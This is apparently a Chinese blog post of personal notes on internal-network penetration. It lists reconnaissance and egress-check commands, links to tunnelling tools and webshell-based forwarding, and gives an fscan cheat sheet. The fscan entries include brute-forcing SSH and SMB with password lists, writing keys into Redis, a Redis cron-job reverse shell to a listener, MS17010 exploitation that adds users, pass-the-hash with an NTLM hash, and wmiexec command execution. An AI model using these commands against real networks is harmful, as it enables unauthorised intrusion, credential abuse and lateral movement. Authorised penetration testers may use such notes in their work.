内网渗透工具

获取网络配置

ipconfig /all
ifconfig
同时通过这个也可以知道是windows还是linux

获取系统信息

systeminfo | findstr /B /C"OS名称 " OS 版本"
systeminfo | findstr /B /C"OSName " OS Version"
其实直接使用systeminfo感觉更靠谱,有些版本格式不一样,查不出来。不如直接使用systeminfo。

使用工具
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

识别杀软网站
https://i.hacking8.com/tiquan/

查看是否出网

ICMP协议

ping www.baidu.com  
tracert baidu.com

TCP/UDP

telnet 192.168.1.108 22        //TCP
nc -zv 39.101.135.232 9999        //TCP
nc -zuv 192.168.1.108 80       //UDP

HTTP/HTTPS


curl http://www.baidu.com      //HTTP
curl https://www.baidu.com     //HTTPS
Linux:wgetcurl
Windows:certutil、powershell、bitsadmin、regsrv......

DNS

dig @8.8.8.8 www.baidu.com        //DNS
nslookup www.baidu.com 8.8.8.8    //DNS

获取权限信息

whoami

隧道搭建

当frp搭建不了的时候,使用webshell来进行一个搭流量转发
https://github.com/zema1/suo5

https://github.com/fatedier/frp/releases/tag/v0.58.1

https://github.com/ehang-io/nps/blob/master/README_zh.md

内网扫描

查询arp缓存表

arp -n
arp -a

使用扫描工具

https://github.com/shmilylty/netspy

nohup netspy is &
nohup netspy is -c 10.0.0.1/8 &

https://github.com/shadow1ng/fscan

fscan.exe -h 192.168.1.1/24  -nobr -nopoc  
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
-socks5

域信息获取

参考[[Cobalt Strike使用]]

posted @   Ho1d_F0rward  阅读(39)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示